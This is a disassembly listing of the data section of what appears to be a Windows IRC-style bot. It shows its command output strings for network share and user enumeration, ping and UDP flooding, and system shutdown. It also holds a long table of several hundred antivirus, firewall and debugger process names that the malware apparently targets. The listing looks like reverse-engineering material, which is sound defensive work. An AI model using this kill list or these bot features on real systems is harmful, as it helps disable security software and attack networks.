aTheSystemIsShu db 'The system is shutting down.',0 ; DATA XREF: sub_409FDF:loc_40A0F7�o
align 4
aAnUnknownErr_0 db 'An unknown error occurred: <%ld>',0 ; DATA XREF: sub_409FDF+12C�o
align 4
aTheFollowingWi db 'The following Windows services are registered:',0
; DATA XREF: sub_40A15D+25�o
align 4
aStopped db ' Stopped',0 ; DATA XREF: sub_40A15D:loc_40A229�o
aStarting db ' Starting',0 ; DATA XREF: sub_40A15D:loc_40A222�o
aStoping db ' Stoping',0 ; DATA XREF: sub_40A15D:loc_40A21B�o
aRunning db ' Running',0 ; DATA XREF: sub_40A15D:loc_40A214�o
aContinuing db ' Continuing',0 ; DATA XREF: sub_40A15D:loc_40A20D�o
aPausing db ' Pausing',0 ; DATA XREF: sub_40A15D:loc_40A206�o
aPaused db ' Paused',0 ; DATA XREF: sub_40A15D:loc_40A1FF�o
aUnknown_0 db ' Unknown',0 ; DATA XREF: sub_40A15D+9B�o
aSSS_0 db '%s: %s (%s)',0 ; DATA XREF: sub_40A15D+EB�o
aNetSShareS_ db '[NET]: %s share: ',27h,'%s',27h,'.',0 ; DATA XREF: sub_40A29A+89�o
align 4
aNetSErrorWithS db '[NET]: %s: Error with share: ',27h,'%s',27h,'. %s',0
; DATA XREF: sub_40A29A+57�o
align 4
aNetSNoShareSpe db '[NET]: %s: No share specified.',0 ; DATA XREF: sub_40A29A+AB�o
align 4
aShareNameResou db 'Share name: Resource: Uses: Desc:',0
; DATA XREF: sub_40A48F+26�o
align 4
aYes db 'Yes',0 ; DATA XREF: sub_40A48F+B5�o
aNo db 'No',0 ; DATA XREF: sub_40A48F+BC�o
align 4
a14s24s6u4s db '%-14S %-24S %-6u %-4s',0 ; DATA XREF: sub_40A48F+D0�o
align 4
aNetShareListEr db '[NET]: Share list error: %s <%ld>',0 ; DATA XREF: sub_40A48F+76�o
align 10h
aNetSUsernameS_ db '[NET]: %s username: ',27h,'%s',27h,'.',0 ; DATA XREF: sub_40A5B0+6D�o
align 4
aNetSErrorWithU db '[NET]: %s: Error with username: ',27h,'%s',27h,'. %s',0
; DATA XREF: sub_40A5B0+94�o
align 4
aNetSNoUsername db '[NET]: %s: No username specified.',0 ; DATA XREF: sub_40A5B0+B6�o
align 4
aAccountS db 'Account: %S',0 ; DATA XREF: sub_40A6F6+50�o
aFullNameS db 'Full Name: %S',0 ; DATA XREF: sub_40A6F6+81�o
align 4
aUserCommentS db 'User Comment: %S',0 ; DATA XREF: sub_40A6F6+AC�o
align 4
aCommentS db 'Comment: %S',0 ; DATA XREF: sub_40A6F6+D4�o
aGuest db 'Guest',0 ; DATA XREF: sub_40A6F6:loc_40A80F�o
align 10h
aUser_0 db 'User',0 ; DATA XREF: sub_40A6F6:loc_40A808�o
align 4
aAdministrator db 'Administrator',0 ; DATA XREF: sub_40A6F6:loc_40A801�o
align 4
aUnknown_1 db 'Unknown',0 ; DATA XREF: sub_40A6F6+104�o
aPrivilegeLevel db 'Privilege Level: %s',0 ; DATA XREF: sub_40A6F6+125�o
aAuthFlagsD db 'Auth Flags: %d',0 ; DATA XREF: sub_40A6F6+14D�o
align 4
aHomeDirectoryS db 'Home Directory: %S',0 ; DATA XREF: sub_40A6F6+178�o
align 4
aParametersS db 'Parameters: %S',0 ; DATA XREF: sub_40A6F6:loc_40A896�o
align 4
aPasswordAgeD db 'Password Age: %d',0 ; DATA XREF: sub_40A6F6+1CB�o
align 4
aBadPasswordCou db 'Bad Password Count: %d',0 ; DATA XREF: sub_40A6F6+1F3�o
align 4
aNumberOfLogins db 'Number of Logins: %d',0 ; DATA XREF: sub_40A6F6+21E�o
align 4
aLastLogonD db 'Last Logon: %d',0 ; DATA XREF: sub_40A6F6+246�o
align 4
aLastLogoffD db 'Last Logoff: %d',0 ; DATA XREF: sub_40A6F6+271�o
aLogonServerS db 'Logon Server: %S',0 ; DATA XREF: sub_40A6F6+299�o
align 10h
aWorkstationsS db 'Workstations: %S',0 ; DATA XREF: sub_40A6F6+2C4�o
align 4
aCountryCodeD db 'Country Code: %d',0 ; DATA XREF: sub_40A6F6+2EC�o
align 4
aUserSLanguageD db 'User',27h,'s Language: %d',0 ; DATA XREF: sub_40A6F6+317�o
aMax_StorageD db 'Max. Storage: %d',0 ; DATA XREF: sub_40A6F6+33F�o
align 10h
aUnitsPerWeekD db 'Units Per Week: %d',0 ; DATA XREF: sub_40A6F6+36A�o
align 4
aNetUserInfoErr db '[NET]: User info error: <%ld>',0 ; DATA XREF: sub_40A6F6+394�o
align 4
aUsernameAccoun db 'Username accounts for local system:',0 ; DATA XREF: sub_40AAC4+29�o
aNetAnAccessVio db '[NET]: An access violation has occured.',0 ; DATA XREF: sub_40AAC4+F7�o
aS_8 db ' %S',0 ; DATA XREF: sub_40AAC4+BE�o
align 4
aNetUserListErr db '[NET]: User list error: %s <%ld>',0 ; DATA XREF: sub_40AAC4+7A�o
align 4
aTotalUsersFoun db 'Total users found: %d.',0 ; DATA XREF: sub_40AAC4+14F�o
align 4
aAccessDenied_ db 'Access denied.',0 ; DATA XREF: sub_40AC44:loc_40ACA7�o
align 4
aLevelParameter db 'Level parameter is invalid.',0 ; DATA XREF: sub_40AC44:loc_40ACE8�o
aTheNameIsInval db 'The name is invalid.',0 ; DATA XREF: sub_40AC44:loc_40ACB1�o
align 4
aInvalidParamet db 'Invalid parameter.',0 ; DATA XREF: sub_40AC44+3B�o
align 4
aNotEnoughMemor db 'Not enough memory.',0 ; DATA XREF: sub_40AC44:loc_40AC9D�o
align 10h
aThisNetworkReq db 'This network request is not supported.',0
; DATA XREF: sub_40AC44:loc_40AC93�o
align 4
aServerNameNotF db 'Server name not found.',0 ; DATA XREF: sub_40AC44:loc_40AC89�o
align 10h
aShareNotFound_ db 'Share not found.',0 ; DATA XREF: sub_40AC44:loc_40AD53�o
align 4
aDuplicateShare db 'Duplicate share name.',0 ; DATA XREF: sub_40AC44+89�o
align 4
aInvalidForRedi db 'Invalid for redirected resource.',0 ; DATA XREF: sub_40AC44:loc_40ACD7�o
align 10h
aDeviceOrDirect db 'Device or directory does not exist.',0
; DATA XREF: sub_40AC44:loc_40ACE1�o
aTheComputerNam db 'The computer name is invalid.',0 ; DATA XREF: sub_40AC44:loc_40AD4C�o
align 4
aTheOperationIs db 'The operation is allowed only on the primary domain controller of'
; DATA XREF: sub_40AC44+CF�o
db ' the domain.',0
align 4
aTheGroupAlread db 'The group already exists.',0 ; DATA XREF: sub_40AC44:loc_40AD21�o
align 10h
aTheUserAccount db 'The user account already exists.',0 ; DATA XREF: sub_40AC44:loc_40AD1A�o
align 4
aThePasswordIsS db 'The password is shorter than required (or does not meet the passw'
; DATA XREF: sub_40AC44:loc_40AD28�o
db 'ord policy requirement.)',0
align 10h
aNetworkConnect db 'Network connection not found.',0 ; DATA XREF: sub_40AC44:loc_40AD61�o
align 10h
aAGeneralFailur db 'A general failure occurred in the network hardware.',0
; DATA XREF: sub_40AC44:loc_40ACEF�o
aTheUserNameCou db 'The user name could not be found.',0 ; DATA XREF: sub_40AC44:loc_40AD5A�o
align 4
aAnUnknownError db 'An unknown error occurred.',0 ; DATA XREF: sub_40AC44:loc_40AD45�o
align 4
aNetMessageSent db '[NET]: Message sent successfully.',0 ; DATA XREF: sub_40AD78+81�o
align 4
aNetSServerSMes db '[NET]: %s <Server: %S> <Message: %S>',0 ; DATA XREF: sub_40AD78+AB�o
align 10h
a__0: ; DATA XREF: .text:0040AE6B�o
unicode 0, <.>,0
a__1: ; DATA XREF: .text:0040AE83�o
unicode 0, <.>,0
aFlushdnsErro_0 db '[FLUSHDNS]: Error getting ARP cache: <%d>.',0
; DATA XREF: sub_40AF08+8C�o
align 4
aFlushdnsUnable db '[FLUSHDNS]: Unable to allocation ARP cache.',0
; DATA XREF: sub_40AF08:loc_40AF9B�o
aFlushdnsArpCac db '[FLUSHDNS]: ARP cache is empty.',0 ; DATA XREF: sub_40AF08:loc_40AF61�o
aFlushdnsNotSup db '[FLUSHDNS]: Not supported by this system.',0
; DATA XREF: sub_40AF08:loc_40AFCD�o
align 4
aFlushdnsErrorG db '[FLUSHDNS]: Error getting ARP cache: <%d>.',0
; DATA XREF: sub_40AF08+43�o
align 4
aD_D_D_D_0 db '%d.%d.%d.%d',0 ; DATA XREF: sub_40AFEC+46�o
aPingErrorSendi db '[PING]: Error sending pings to %s.',0 ; DATA XREF: sub_40B0E5+6E�o
align 4
aPingFinishedSe db '[PING]: Finished sending pings to %s.',0 ; DATA XREF: sub_40B0E5+13C�o
align 10h
aUdpErrorSendin db '[UDP]: Error sending pings to %s.',0 ; DATA XREF: sub_40B271+8E�o
align 4
aUdpFinishedSen db '[UDP]: Finished sending packets to %s.',0 ; DATA XREF: sub_40B271+1C6�o
align 4
dword_43B33C dd 7530h ; DATA XREF: sub_40B84A+12�r
off_43B340 dd offset aAckwin32_exe ; DATA XREF: sub_40B4F2+CB�o
; "ACKWIN32.EXE"
dd offset aAdaware_exe ; "ADAWARE.EXE"
dd offset aAdvxdwin_exe ; "ADVXDWIN.EXE"
dd offset aAgentsvr_exe ; "AGENTSVR.EXE"
dd offset aAgentw_exe ; "AGENTW.EXE"
dd offset aAlertsvc_exe ; "ALERTSVC.EXE"
dd offset aAlevir_exe ; "ALEVIR.EXE"
dd offset aAlogserv_exe ; "ALOGSERV.EXE"
dd offset aAmon9x_exe ; "AMON9X.EXE"
dd offset aAntiTrojan_exe ; "ANTI-TROJAN.EXE"
dd offset aAntivirus_exe ; "ANTIVIRUS.EXE"
dd offset aAnts_exe ; "ANTS.EXE"
dd offset aApimonitor_exe ; "APIMONITOR.EXE"
dd offset aAplica32_exe ; "APLICA32.EXE"
dd offset aApvxdwin_exe ; "APVXDWIN.EXE"
dd offset aArr_exe ; "ARR.EXE"
dd offset aAtcon_exe ; "ATCON.EXE"
dd offset aAtguard_exe ; "ATGUARD.EXE"
dd offset aAtro55en_exe ; "ATRO55EN.EXE"
dd offset aAtupdater_exe ; "ATUPDATER.EXE"
dd offset aAtupdater_ex_0 ; "ATUPDATER.EXE"
dd offset aAtwatch_exe ; "ATWATCH.EXE"
dd offset aAu_exe ; "AU.EXE"
dd offset aAupdate_exe ; "AUPDATE.EXE"
dd offset aAupdate_exe_0 ; "AUPDATE.EXE"
dd offset aAutodown_exe ; "AUTODOWN.EXE"
dd offset aAutodown_exe_0 ; "AUTODOWN.EXE"
dd offset aAutotrace_exe ; "AUTOTRACE.EXE"
dd offset aAutotrace_ex_0 ; "AUTOTRACE.EXE"
dd offset aAutoupdate_exe ; "AUTOUPDATE.EXE"
dd offset aAutoupdate_e_0 ; "AUTOUPDATE.EXE"
dd offset aAvconsol_exe ; "AVCONSOL.EXE"
dd offset aAve32_exe ; "AVE32.EXE"
dd offset aAvgcc32_exe ; "AVGCC32.EXE"
dd offset aAvgctrl_exe ; "AVGCTRL.EXE"
dd offset aAvgnt_exe ; "AVGNT.EXE"
dd offset aAvgserv_exe ; "AVGSERV.EXE"
dd offset aAvgserv9_exe ; "AVGSERV9.EXE"
dd offset aAvguard_exe ; "AVGUARD.EXE"
dd offset aAvgw_exe ; "AVGW.EXE"
dd offset aAvkpop_exe ; "AVKPOP.EXE"
dd offset aAvkserv_exe ; "AVKSERV.EXE"
dd offset aAvkservice_exe ; "AVKSERVICE.EXE"
dd offset aAvkwctl9_exe ; "AVKWCTl9.EXE"
dd offset aAvltmain_exe ; "AVLTMAIN.EXE"
dd offset aAvnt_exe ; "AVNT.EXE"
dd offset aAvp_exe ; "AVP.EXE"
dd offset aAvp32_exe ; "AVP32.EXE"
dd offset aAvpcc_exe ; "AVPCC.EXE"
dd offset aAvpdos32_exe ; "AVPDOS32.EXE"
dd offset aAvpm_exe ; "AVPM.EXE"
dd offset aAvptc32_exe ; "AVPTC32.EXE"
dd offset aAvpupd_exe ; "AVPUPD.EXE"
dd offset aAvpupd_exe_0 ; "AVPUPD.EXE"
dd offset aAvsched32_exe ; "AVSCHED32.EXE"
dd offset aAvsynmgr_exe ; "AVSYNMGR.EXE"
dd offset aAvwin95_exe ; "AVWIN95.EXE"
dd offset aAvwinnt_exe ; "AVWINNT.EXE"
dd offset aAvwupd_exe ; "AVWUPD.EXE"
dd offset aAvwupd32_exe ; "AVWUPD32.EXE"
dd offset aAvwupd32_exe_0 ; "AVWUPD32.EXE"
dd offset aAvwupsrv_exe ; "AVWUPSRV.EXE"
dd offset aAvxmonitor9x_e ; "AVXMONITOR9X.EXE"
dd offset aAvxmonitornt_e ; "AVXMONITORNT.EXE"
dd offset aAvxquar_exe ; "AVXQUAR.EXE"
dd offset aAvxquar_exe_0 ; "AVXQUAR.EXE"
dd offset aBackweb_exe ; "BACKWEB.EXE"
dd offset aBargains_exe ; "BARGAINS.EXE"
dd offset aBd_professiona ; "BD_PROFESSIONAL.EXE"
dd offset aBeagle_exe ; "BEAGLE.EXE"
dd offset aBelt_exe ; "BELT.EXE"
dd offset aBidef_exe ; "BIDEF.EXE"
dd offset aBidserver_exe ; "BIDSERVER.EXE"
dd offset aBipcp_exe ; "BIPCP.EXE"
dd offset aBipcpevalsetup ; "BIPCPEVALSETUP.EXE"
dd offset aBisp_exe ; "BISP.EXE"
dd offset aBlackd_exe ; "BLACKD.EXE"
dd offset aBlackice_exe ; "BLACKICE.EXE"
dd offset aBlss_exe ; "BLSS.EXE"
dd offset aBootconf_exe ; "BOOTCONF.EXE"
dd offset aBootwarn_exe ; "BOOTWARN.EXE"
dd offset aBorg2_exe ; "BORG2.EXE"
dd offset aBpc_exe ; "BPC.EXE"
dd offset aBrasil_exe ; "BRASIL.EXE"
dd offset aBs120_exe ; "BS120.EXE"
dd offset aBundle_exe ; "BUNDLE.EXE"
dd offset aBvt_exe ; "BVT.EXE"
dd offset aCcapp_exe ; "CCAPP.EXE"
dd offset aCcevtmgr_exe ; "CCEVTMGR.EXE"
dd offset aCcpxysvc_exe ; "CCPXYSVC.EXE"
dd offset aCdp_exe ; "CDP.EXE"
dd offset aCfd_exe ; "CFD.EXE"
dd offset aCfgwiz_exe ; "CFGWIZ.EXE"
dd offset aCfiadmin_exe ; "CFIADMIN.EXE"
dd offset aCfiaudit_exe ; "CFIAUDIT.EXE"
dd offset aCfiaudit_exe_0 ; "CFIAUDIT.EXE"
dd offset aCfinet_exe ; "CFINET.EXE"
dd offset aCfinet32_exe ; "CFINET32.EXE"
dd offset aClaw95cf_exe ; "CLAW95CF.EXE"
dd offset aClean_exe ; "CLEAN.EXE"
dd offset aCleaner_exe ; "CLEANER.EXE"
dd offset aCleaner3_exe ; "CLEANER3.EXE"
dd offset aCleanpc_exe ; "CLEANPC.EXE"
dd offset aClick_exe ; "CLICK.EXE"
dd offset aCmd32_exe ; "CMD32.EXE"
dd offset aCmesys_exe ; "CMESYS.EXE"
dd offset aCmgrdian_exe ; "CMGRDIAN.EXE"
dd offset aCmon016_exe ; "CMON016.EXE"
dd offset aConnectionmoni ; "CONNECTIONMONITOR.EXE"
dd offset aCpd_exe ; "CPD.EXE"
dd offset aCpf9x206_exe ; "CPF9X206.EXE"
dd offset aCpfnt206_exe ; "CPFNT206.EXE"
dd offset aCtrl_exe ; "CTRL.EXE"
dd offset aCv_exe ; "CV.EXE"
dd offset aCwnb181_exe ; "CWNB181.EXE"
dd offset aCwntdwmo_exe ; "CWNTDWMO.EXE"
dd offset aClaw95_exe ; "Claw95.EXE"
dd offset aClaw95cf_exe_0 ; "CLAW95CF.EXE"
dd offset aDatemanager_ex ; "DATEMANAGER.EXE"
dd offset aDcomx_exe ; "DCOMX.EXE"
dd offset aDefalert_exe ; "DEFALERT.EXE"
dd offset aDefscangui_exe ; "DEFSCANGUI.EXE"
dd offset aDefwatch_exe ; "DEFWATCH.EXE"
dd offset aDeputy_exe ; "DEPUTY.EXE"
dd offset aDivx_exe ; "DIVX.EXE"
dd offset aDllcache_exe ; "DLLCACHE.EXE"
dd offset aDllreg_exe ; "DLLREG.EXE"
dd offset aDoors_exe ; "DOORS.EXE"
dd offset aDpf_exe ; "DPF.EXE"
dd offset aDpfsetup_exe ; "DPFSETUP.EXE"
dd offset aDpps2_exe ; "DPPS2.EXE"
dd offset aDrwatson_exe ; "DRWATSON.EXE"
dd offset aDrweb32_exe ; "DRWEB32.EXE"
dd offset aDrwebupw_exe ; "DRWEBUPW.EXE"
dd offset aDssagent_exe ; "DSSAGENT.EXE"
dd offset aDvp95_exe ; "DVP95.EXE"
dd offset aDvp95_0_exe ; "DVP95_0.EXE"
dd offset aEcengine_exe ; "ECENGINE.EXE"
dd offset aEfpeadm_exe ; "EFPEADM.EXE"
dd offset aEmsw_exe ; "EMSW.EXE"
dd offset aEnt_exe ; "ENT.EXE"
dd offset aEsafe_exe ; "ESAFE.EXE"
dd offset aEscanh95_exe ; "ESCANH95.EXE"
dd offset aEscanhnt_exe ; "ESCANHNT.EXE"
dd offset aEscanv95_exe ; "ESCANV95.EXE"
dd offset aEspwatch_exe ; "ESPWATCH.EXE"
dd offset aEthereal_exe ; "ETHEREAL.EXE"
dd offset aEtrustcipe_exe ; "ETRUSTCIPE.EXE"
dd offset aEvpn_exe ; "EVPN.EXE"
dd offset aExantivirusCne ; "EXANTIVIRUS-CNET.EXE"
dd offset aExe_avxw_exe ; "EXE.AVXW.EXE"
dd offset aExpert_exe ; "EXPERT.EXE"
dd offset aExplore_exe ; "EXPLORE.EXE"
dd offset aFAgnt95_exe ; "F-AGNT95.EXE"
dd offset aFProt_exe ; "F-PROT.EXE"
dd offset aFProt95_exe ; "F-PROT95.EXE"
dd offset aFStopw_exe ; "F-STOPW.EXE"
dd offset aFameh32_exe ; "FAMEH32.EXE"
dd offset aFast_exe ; "FAST.EXE"
dd offset aFch32_exe ; "FCH32.EXE"
dd offset aFih32_exe ; "FIH32.EXE"
dd offset aFindviru_exe ; "FINDVIRU.EXE"
dd offset aFirewall_exe ; "FIREWALL.EXE"
dd offset aFlowprotector_ ; "FLOWPROTECTOR.EXE"
dd offset aFnrb32_exe ; "FNRB32.EXE"
dd offset aFpWin_exe ; "FP-WIN.EXE"
dd offset aFpWin_trial_ex ; "FP-WIN_TRIAL.EXE"
dd offset aFprot_exe ; "FPROT.EXE"
dd offset aFrw_exe ; "FRW.EXE"
dd offset aFsaa_exe ; "FSAA.EXE"
dd offset aFsav_exe ; "FSAV.EXE"
dd offset aFsav32_exe ; "FSAV32.EXE"
dd offset aFsav530stbyb_e ; "FSAV530STBYB.EXE"
dd offset aFsav530wtbyb_e ; "FSAV530WTBYB.EXE"
dd offset aFsav95_exe ; "FSAV95.EXE"
dd offset aFsgk32_exe ; "FSGK32.EXE"
dd offset aFsm32_exe ; "FSM32.EXE"
dd offset aFsma32_exe ; "FSMA32.EXE"
dd offset aFsmb32_exe ; "FSMB32.EXE"
dd offset aGator_exe ; "GATOR.EXE"
dd offset aGbmenu_exe ; "GBMENU.EXE"
dd offset aGbpoll_exe ; "GBPOLL.EXE"
dd offset aGenerics_exe ; "GENERICS.EXE"
dd offset aGmt_exe ; "GMT.EXE"
dd offset aGuard_exe ; "GUARD.EXE"
dd offset aGuarddog_exe ; "GUARDDOG.EXE"
dd offset aHacktracersetu ; "HACKTRACERSETUP.EXE"
dd offset aHbinst_exe ; "HBINST.EXE"
dd offset aHbsrv_exe ; "HBSRV.EXE"
dd offset aHotactio_exe ; "HOTACTIO.EXE"
dd offset aHotpatch_exe ; "HOTPATCH.EXE"
dd offset aHtlog_exe ; "HTLOG.EXE"
dd offset aHtpatch_exe ; "HTPATCH.EXE"
dd offset aHwpe_exe ; "HWPE.EXE"
dd offset aHxdl_exe ; "HXDL.EXE"
dd offset aHxiul_exe ; "HXIUL.EXE"
dd offset aIamapp_exe ; "IAMAPP.EXE"
dd offset aIamserv_exe ; "IAMSERV.EXE"
dd offset aIamstats_exe ; "IAMSTATS.EXE"
dd offset aIbmasn_exe ; "IBMASN.EXE"
dd offset aIbmavsp_exe ; "IBMAVSP.EXE"
dd offset aIcload95_exe ; "ICLOAD95.EXE"
dd offset aIcloadnt_exe ; "ICLOADNT.EXE"
dd offset aIcmon_exe ; "ICMON.EXE"
dd offset aIcsupp95_exe ; "ICSUPP95.EXE"
dd offset aIcsupp95_exe_0 ; "ICSUPP95.EXE"
dd offset aIcsuppnt_exe ; "ICSUPPNT.EXE"
dd offset aIdle_exe ; "IDLE.EXE"
dd offset aIedll_exe ; "IEDLL.EXE"
dd offset aIedriver_exe ; "IEDRIVER.EXE"
dd offset aIexplorer_exe ; "IEXPLORER.EXE"
dd offset aIface_exe ; "IFACE.EXE"
dd offset aIfw2000_exe ; "IFW2000.EXE"
dd offset aInetlnfo_exe ; "INETLNFO.EXE"
dd offset aInfus_exe ; "INFUS.EXE"
dd offset aInfwin_exe ; "INFWIN.EXE"
dd offset aInit_exe ; "INIT.EXE"
dd offset aIntdel_exe ; "INTDEL.EXE"
dd offset aIntren_exe ; "INTREN.EXE"
dd offset aIomon98_exe ; "IOMON98.EXE"
dd offset aIparmor_exe ; "IPARMOR.EXE"
dd offset aIris_exe ; "IRIS.EXE"
dd offset aIsass_exe ; "ISASS.EXE"
dd offset aIsrv95_exe ; "ISRV95.EXE"
dd offset aIstsvc_exe ; "ISTSVC.EXE"
dd offset aJammer_exe ; "JAMMER.EXE"
dd offset aJdbgmrg_exe ; "JDBGMRG.EXE"
dd offset aJedi_exe ; "JEDI.EXE"
dd offset aKavlite40eng_e ; "KAVLITE40ENG.EXE"
dd offset aKavpers40eng_e ; "KAVPERS40ENG.EXE"
dd offset aKavpf_exe ; "KAVPF.EXE"
dd offset aKazza_exe ; "KAZZA.EXE"
dd offset aKeenvalue_exe ; "KEENVALUE.EXE"
dd offset aKerioPf213EnWi ; "KERIO-PF-213-EN-WIN.EXE"
dd offset aKerioWrl421EnW ; "KERIO-WRL-421-EN-WIN.EXE"
dd offset aKerioWrp421EnW ; "KERIO-WRP-421-EN-WIN.EXE"
dd offset aKernel32_exe ; "KERNEL32.EXE"
dd offset aKillprocessset ; "KILLPROCESSSETUP161.EXE"
dd offset aLauncher_exe ; "LAUNCHER.EXE"
dd offset aLdnetmon_exe ; "LDNETMON.EXE"
dd offset aLdpro_exe ; "LDPRO.EXE"
dd offset aLdpromenu_exe ; "LDPROMENU.EXE"
dd offset aLdscan_exe ; "LDSCAN.EXE"
dd offset aLnetinfo_exe ; "LNETINFO.EXE"
dd offset aLoader_exe ; "LOADER.EXE"
dd offset aLocalnet_exe ; "LOCALNET.EXE"
dd offset aLockdown_exe ; "LOCKDOWN.EXE"
dd offset aLockdown2000_e ; "LOCKDOWN2000.EXE"
dd offset aLookout_exe ; "LOOKOUT.EXE"
dd offset aLordpe_exe ; "LORDPE.EXE"
dd offset aLsetup_exe ; "LSETUP.EXE"
dd offset aLuall_exe ; "LUALL.EXE"
dd offset aLuall_exe_0 ; "LUALL.EXE"
dd offset aLuau_exe ; "LUAU.EXE"
dd offset aLucomserver_ex ; "LUCOMSERVER.EXE"
dd offset aLuinit_exe ; "LUINIT.EXE"
dd offset aLuspt_exe ; "LUSPT.EXE"
dd offset aMapisvc32_exe ; "MAPISVC32.EXE"
dd offset aMcagent_exe ; "MCAGENT.EXE"
dd offset aMcmnhdlr_exe ; "MCMNHDLR.EXE"
dd offset aMcshield_exe ; "MCSHIELD.EXE"
dd offset aMctool_exe ; "MCTOOL.EXE"
dd offset aMcupdate_exe ; "MCUPDATE.EXE"
dd offset aMcupdate_exe_0 ; "MCUPDATE.EXE"
dd offset aMcvsrte_exe ; "MCVSRTE.EXE"
dd offset aMcvsshld_exe ; "MCVSSHLD.EXE"
dd offset aMd_exe ; "MD.EXE"
dd offset aMfin32_exe ; "MFIN32.EXE"
dd offset aMfw2en_exe ; "MFW2EN.EXE"
dd offset aMfweng3_02d30_ ; "MFWENG3.02D30.EXE"
dd offset aMgavrtcl_exe ; "MGAVRTCL.EXE"
dd offset aMgavrte_exe ; "MGAVRTE.EXE"
dd offset aMghtml_exe ; "MGHTML.EXE"
dd offset aMgui_exe ; "MGUI.EXE"
dd offset aMinilog_exe ; "MINILOG.EXE"
dd offset aMmod_exe ; "MMOD.EXE"
dd offset aMonitor_exe ; "MONITOR.EXE"
dd offset aMoolive_exe ; "MOOLIVE.EXE"
dd offset aMostat_exe ; "MOSTAT.EXE"
dd offset aMpfagent_exe ; "MPFAGENT.EXE"
dd offset aMpfservice_exe ; "MPFSERVICE.EXE"
dd offset aMpftray_exe ; "MPFTRAY.EXE"
dd offset aMrflux_exe ; "MRFLUX.EXE"
dd offset aMsapp_exe ; "MSAPP.EXE"
dd offset aMsbb_exe ; "MSBB.EXE"
dd offset aMsblast_exe ; "MSBLAST.EXE"
dd offset aMscache_exe ; "MSCACHE.EXE"
dd offset aMsccn32_exe ; "MSCCN32.EXE"
dd offset aMscman_exe ; "MSCMAN.EXE"
dd offset aMsconfig_exe ; "MSCONFIG.EXE"
dd offset aMsdm_exe ; "MSDM.EXE"
dd offset aMsdos_exe ; "MSDOS.EXE"
dd offset aMsiexec16_exe ; "MSIEXEC16.EXE"
dd offset aMsinfo32_exe ; "MSINFO32.EXE"
dd offset aMslaugh_exe ; "MSLAUGH.EXE"
dd offset aMsmgt_exe ; "MSMGT.EXE"
dd offset aMsmsgri32_exe ; "MSMSGRI32.EXE"
dd offset aMssmmc32_exe ; "MSSMMC32.EXE"
dd offset aMssys_exe ; "MSSYS.EXE"
dd offset aMsvxd_exe ; "MSVXD.EXE"
dd offset aMu0311ad_exe ; "MU0311AD.EXE"
dd offset aMwatch_exe ; "MWATCH.EXE"
dd offset aN32scanw_exe ; "N32SCANW.EXE"
dd offset aNav_exe ; "NAV.EXE"
dd offset aAutoProtect_na ; "AUTO-PROTECT.NAV80TRY.EXE"
dd offset aNavap_navapsvc ; "NAVAP.NAVAPSVC.EXE"
dd offset aNavapsvc_exe ; "NAVAPSVC.EXE"
dd offset aNavapw32_exe ; "NAVAPW32.EXE"
dd offset aNavdx_exe ; "NAVDX.EXE"
dd offset aNavengnavex15_ ; "NAVENGNAVEX15.NAVLU32.EXE"
dd offset aNavlu32_exe ; "NAVLU32.EXE"
dd offset aNavnt_exe ; "NAVNT.EXE"
dd offset aNavstub_exe ; "NAVSTUB.EXE"
dd offset aNavw32_exe ; "NAVW32.EXE"
dd offset aNavwnt_exe ; "NAVWNT.EXE"
dd offset aNc2000_exe ; "NC2000.EXE"
dd offset aNcinst4_exe ; "NCINST4.EXE"
dd offset aNdd32_exe ; "NDD32.EXE"
dd offset aNeomonitor_exe ; "NEOMONITOR.EXE"
dd offset aNeowatchlog_ex ; "NEOWATCHLOG.EXE"
dd offset aNetarmor_exe ; "NETARMOR.EXE"
dd offset aNetd32_exe ; "NETD32.EXE"
dd offset aNetinfo_exe ; "NETINFO.EXE"
dd offset aNetmon_exe ; "NETMON.EXE"
dd offset aNetscanpro_exe ; "NETSCANPRO.EXE"
dd offset aNetspyhunter1_ ; "NETSPYHUNTER-1.2.EXE"
dd offset aNetstat_exe ; "NETSTAT.EXE"
dd offset aNetutils_exe ; "NETUTILS.EXE"
dd offset aNisserv_exe ; "NISSERV.EXE"
dd offset aNisum_exe ; "NISUM.EXE"
dd offset aNmain_exe ; "NMAIN.EXE"
dd offset aNod32_exe ; "NOD32.EXE"
dd offset aNormist_exe ; "NORMIST.EXE"
dd offset aNorton_interne ; "NORTON_INTERNET_SECU_3.0_407.EXE"
dd offset aNotstart_exe ; "NOTSTART.EXE"
dd offset aNpf40_tw_98_nt ; "NPF40_TW_98_NT_ME_2K.EXE"
dd offset aNpfmessenger_e ; "NPFMESSENGER.EXE"
dd offset aNprotect_exe ; "NPROTECT.EXE"
dd offset aNpscheck_exe ; "NPSCHECK.EXE"
dd offset aNpssvc_exe ; "NPSSVC.EXE"
dd offset aNsched32_exe ; "NSCHED32.EXE"
dd offset aNssys32_exe ; "NSSYS32.EXE"
dd offset aNstask32_exe ; "NSTASK32.EXE"
dd offset aNsupdate_exe ; "NSUPDATE.EXE"
dd offset aNt_exe ; "NT.EXE"
dd offset aNtrtscan_exe ; "NTRTSCAN.EXE"
dd offset aNtvdm_exe ; "NTVDM.EXE"
dd offset aNtxconfig_exe ; "NTXconfig.EXE"
dd offset aNui_exe ; "NUI.EXE"
dd offset aNupgrade_exe ; "NUPGRADE.EXE"
dd offset aNupgrade_exe_0 ; "NUPGRADE.EXE"
dd offset aNvarch16_exe ; "NVARCH16.EXE"
dd offset aNvc95_exe ; "NVC95.EXE"
dd offset aNvsvc32_exe ; "NVSVC32.EXE"
dd offset aNwinst4_exe ; "NWINST4.EXE"
dd offset aNwservice_exe ; "NWSERVICE.EXE"
dd offset aNwtool16_exe ; "NWTOOL16.EXE"
dd offset aOllydbg_exe ; "OLLYDBG.EXE"
dd offset aOnsrvr_exe ; "ONSRVR.EXE"
dd offset aOptimize_exe ; "OPTIMIZE.EXE"
dd offset aOstronet_exe ; "OSTRONET.EXE"
dd offset aOtfix_exe ; "OTFIX.EXE"
dd offset aOutpost_exe ; "OUTPOST.EXE"
dd offset aOutpost_exe_0 ; "OUTPOST.EXE"
dd offset aOutpostinstall ; "OUTPOSTINSTALL.EXE"
dd offset aOutpostproinst ; "OUTPOSTPROINSTALL.EXE"
dd offset aPadmin_exe ; "PADMIN.EXE"
dd offset aPanixk_exe ; "PANIXK.EXE"
dd offset aPatch_exe ; "PATCH.EXE"
dd offset aPavcl_exe ; "PAVCL.EXE"
dd offset aPavproxy_exe ; "PAVPROXY.EXE"
dd offset aPavsched_exe ; "PAVSCHED.EXE"
dd offset aPavw_exe ; "PAVW.EXE"
dd offset aPcc2002s902_ex ; "PCC2002S902.EXE"
dd offset aPcc2k_76_1436_ ; "PCC2K_76_1436.EXE"
dd offset aPcciomon_exe ; "PCCIOMON.EXE"
